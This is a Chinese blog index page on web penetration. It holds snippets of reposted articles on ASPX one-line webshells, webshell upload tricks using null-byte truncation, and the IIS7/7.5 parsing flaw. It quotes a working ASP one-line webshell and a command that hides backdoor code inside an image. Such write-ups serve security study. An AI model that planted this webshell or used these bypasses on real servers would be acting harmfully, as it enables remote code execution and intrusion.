
web渗透
阿龙丶
一切安好,便是晴天。
展开
-
ASPX一句话木马详细分析
首先回顾一下以前ASP一句话的经典木马吧!<%if request("nonamed")<>"" then execute request("nonamed")%>VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!.....然...转载 2018-12-28 09:29:15 · 11985 阅读 · 1 评论 -
一句话木马上传常见的几种方法
1,利用00截断,brupsuite上传利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。 假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg ,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将lubr.p...转载 2018-12-28 10:19:49 · 10864 阅读 · 1 评论 -
IIS7&7.5解析漏洞
IIS7/7.5在Fast-CGI运行模式下,在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。常用利用方法:将一张图和一个写入后门代码的文本文件合并将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾e.g.copy xx.jpg/b + yy.txt/a xy.jpg######################...转载 2019-03-13 20:40:34 · 2405 阅读 · 0 评论